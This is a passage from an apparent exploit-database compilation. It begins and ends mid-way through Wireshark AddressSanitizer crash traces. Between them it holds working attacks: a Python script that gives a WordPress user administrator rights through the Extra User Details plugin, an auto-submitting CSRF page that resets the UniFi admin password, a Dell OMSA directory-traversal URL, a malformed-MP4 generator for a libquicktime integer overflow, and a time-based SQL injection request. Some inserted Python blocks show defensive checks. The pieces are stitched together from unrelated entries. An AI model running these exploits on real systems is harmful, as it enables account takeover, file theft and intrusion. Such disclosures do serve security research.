Right alloca redzone: cb
==25920==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39491.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.
An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value
"""
#!/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import sys

import requests
from bs4 import BeautifulSoup

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
    print('Login error')
    sys.exit(1)
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
    print('Error')
    sys.exit(1)
# The 'eud' prefix is stripped server-side, so this value is written to the
# wp_capabilities user meta
data = {
    'eudwp_capabilities[administrator]': 1,
}
# Replay every pre-filled field of the profile form (hidden fields such as the
# nonce included) so that the profile update is accepted
for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
    print('Success')
    sys.exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-352]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application specific functionalities becoming vulnerable. An attacker needs
to trick the victim to visit an arbitrary website in order to exploit the
vulnerability. Successful exploits can allow the attacker to compromise the
whole application including connected devices, e.g. by changing passwords
of users, adding new users, changing device usernames and passwords or by
creating new WLAN configurations.
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
<head>
<script>
function load() {
var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
'<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
'</form>';
top.frames[0].document.body.innerHTML=postdata;
top.frames[0].document.getElementById('csrf').submit();
}
</script>
</head>
<body onload="load()">
<iframe src="about:blank" id="noreferer"></iframe>
</body>
</html>
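The bypass above works because the check asks only whether the Referer is foreign, never whether it is present at all. The following Python is an added example, not code from the advisory or from Ubiquiti: a weak Referer-only check written to behave the way the advisory describes, beside a check that consults Origin first and fails closed when neither header is present. The controller origin and the sample header sets are constructed placeholders.

```python
from urllib.parse import urlsplit

# Assumed controller origin (placeholder, not taken from the advisory).
TRUSTED_ORIGIN = "https://controller.example.internal:8443"


def _same_origin(url: str) -> bool:
    """True when url's scheme, host and port all match TRUSTED_ORIGIN."""
    got, want = urlsplit(url), urlsplit(TRUSTED_ORIGIN)
    return (got.scheme, got.hostname, got.port) == (want.scheme, want.hostname, want.port)


def referer_only_check(headers: dict) -> bool:
    """Weak check modelled on the advisory: a foreign Referer is rejected,
    but a request carrying no Referer at all is let through."""
    referer = headers.get("Referer")
    if referer is None:
        return True          # BUG: absence of Referer is treated as trusted
    return _same_origin(referer)


def strict_origin_check(headers: dict) -> bool:
    """Hardened check: Origin first, then Referer; reject the opaque
    'null' Origin and fail closed when neither header is present."""
    origin = headers.get("Origin")
    if origin is not None:
        if origin == "null":
            return False
        return _same_origin(origin)
    referer = headers.get("Referer")
    if referer is None:
        return False         # no provenance at all: refuse the state change
    return _same_origin(referer)


# Constructed sample header sets (not captured traffic).
SAMPLE_REQUESTS = {
    "legit": {"Origin": TRUSTED_ORIGIN, "Referer": TRUSTED_ORIGIN + "/manage/"},
    "foreign": {"Origin": "https://other.example", "Referer": "https://other.example/page"},
    "no_headers": {},   # the case the PoC relies on: neither header sent
}


def evaluate(check) -> dict:
    """Run one check over every sample request; returns name -> accepted."""
    return {name: check(h) for name, h in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    print("referer only :", evaluate(referer_only_check))
    print("strict origin:", evaluate(strict_origin_check))
```

A header check of this kind is a secondary control only; the primary CSRF defence is a per-session token that the server verifies on every state-changing request, with the Origin/Referer check layered on top.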
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes for his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link: http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
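The note that the file value may not begin with a separator or a dot describes a prefix filter, and the URL above shows why that is not enough: the ".." segments follow a harmless leading component. The Python below is an added example, not Dell's code, that reproduces such a filter beside a check that canonicalises root + path + file under Windows path rules (ntpath, so it runs the same on any host) and serves the file only when the result still lies under the root. The root directory and the two file values are constructed.

```python
import ntpath

# Assumed on-disk root the ViewFile handler serves from (placeholder,
# not taken from the advisory).
SERVE_ROOT = r"C:\OMSA\data"


def naive_filter_accepts(file_param: str) -> bool:
    """The kind of prefix filter the advisory describes: the file value may
    not start with a path separator or a dot. It says nothing about '..'
    segments that come after a harmless first component."""
    return not file_param.startswith(("\\", "/", "."))


def resolve_within_root(path_param: str, file_param: str):
    """Join root + path + file, normalise with Windows semantics, and return
    the result only if it is still inside SERVE_ROOT; otherwise None."""
    root = ntpath.normpath(SERVE_ROOT)
    # A leading separator on path would replace the root in ntpath.join,
    # so strip it: the path parameter is always relative to the root here.
    candidate = ntpath.normpath(ntpath.join(root, path_param.lstrip("\\/"), file_param))
    inside = candidate.lower().startswith(root.lower() + "\\")
    if candidate.lower() != root.lower() and not inside:
        return None
    return candidate


# Constructed inputs in the shape of the advisory's URL.
TRAVERSAL_FILE = r"hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log"
BENIGN_FILE = r"report.txt"


if __name__ == "__main__":
    for f in (BENIGN_FILE, TRAVERSAL_FILE):
        print(f)
        print("  prefix filter accepts:", naive_filter_accepts(f))
        print("  resolved path        :", resolve_within_root(r"\temp", f))
```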
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime_File_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
"6D6F6F76" #### moov atom
"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
"7472616B" #### trak atom
"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
"6D646961" #### mdia atom
"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
"4E" #### hdlr atom length
"68646C72" #### hdlr atom
"0000000000"
"4141414141414141" #### our airstrip :)
"0000000000000000000000"
"EC" #### 236 > 127 <-- overflow here and a change in signedness too
"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))

def createPoC():
    # Write the crafted atoms to disk as nemux.mp4
    try:
        with open("./nemux.mp4", "wb") as output:
            output.write(hax0r_mp4)
        print("[*] The PoC is done!")
    except Exception as e:
        print(str(e))
        print("[*] mmmm!")

def usage():
    print("\nUsage? Run it -> " + sys.argv[0])
    print("this poc creates an mp4 file named nemux.mp4")
    print("--------------------------------------------")
    print("This dummy help? " + sys.argv[0] + " help\n")
    sys.exit()

if __name__ == "__main__":
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print("\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n")
            print("Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n")
            createPoC()
    except Exception as e:
        print(str(e))
        print("Ok... Something went wrong...")
        sys.exit()
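The comment on the 0xEC byte above is the whole bug: a one-byte length of 236 that a parser keeps in a signed char becomes -20, and a size check written against that value no longer means what it says. As an added example that is not libquicktime's code, the Python below reads the hdlr component-name length as an unsigned byte and verifies it against the bytes actually present in the atom, so a 0x4E-byte hdlr atom whose name claims 236 bytes is rejected. The atom layout and the two sample atoms it builds are constructed to match the shape of the PoC, not copied from it.

```python
import struct

# version/flags(4) + component type(4) + subtype(4) + manufacturer(4)
# + component flags(4) + flags mask(4), as in a QuickTime-style hdlr atom
HDLR_FIXED_FIELDS = 24


def length_byte_as_signed_and_unsigned(b: bytes):
    """The two readings of one length byte: 0xEC is 236 unsigned but -20
    when the parser stores it in a plain (signed) char."""
    return struct.unpack("b", b)[0], struct.unpack("B", b)[0]


def parse_hdlr_component_name(atom: bytes):
    """Return (name, None) on success or (None, reason) on rejection for an
    hdlr atom whose component name is a Pascal string (1 length byte + data).
    Every length is checked against what is actually present."""
    if len(atom) < 8:
        return None, "truncated atom header"
    size, fourcc = struct.unpack(">I4s", atom[:8])
    if fourcc != b"hdlr":
        return None, "not an hdlr atom"
    if size < 8 or size > len(atom):
        return None, "atom size %d larger than the %d bytes available" % (size, len(atom))
    body = atom[8:size]
    if len(body) < HDLR_FIXED_FIELDS + 1:
        return None, "body too short for the name length byte"
    name_len = body[HDLR_FIXED_FIELDS]          # unsigned, 0..255, never negative
    available = len(body) - HDLR_FIXED_FIELDS - 1
    if name_len > available:
        return None, "name length %d exceeds %d available bytes" % (name_len, available)
    start = HDLR_FIXED_FIELDS + 1
    return bytes(body[start:start + name_len]), None


def build_hdlr(name_len_byte: int, name: bytes) -> bytes:
    """Construct a minimal hdlr atom (test data, not the PoC's bytes)."""
    fixed = b"\x00" * 4 + b"AAAA" * 3 + b"\x00" * 8      # 24 bytes of fixed fields
    body = fixed + bytes([name_len_byte]) + name
    return struct.pack(">I4s", 8 + len(body), b"hdlr") + body


WELL_FORMED = build_hdlr(12, b"SoundHandler")
# Same shape as the PoC: a 0x4E-byte atom whose length byte 0xEC (236)
# promises far more name bytes than the 45 that follow it.
OVERSIZED = build_hdlr(0xEC, b"a" * 45)


if __name__ == "__main__":
    print("0xEC as signed/unsigned:", length_byte_as_signed_and_unsigned(b"\xec"))
    print("well formed:", parse_hdlr_component_name(WELL_FORMED))
    print("oversized  :", parse_hdlr_component_name(OVERSIZED))
```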
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET requests.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
=df2e
-----END PGP SIGNATURE-----
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
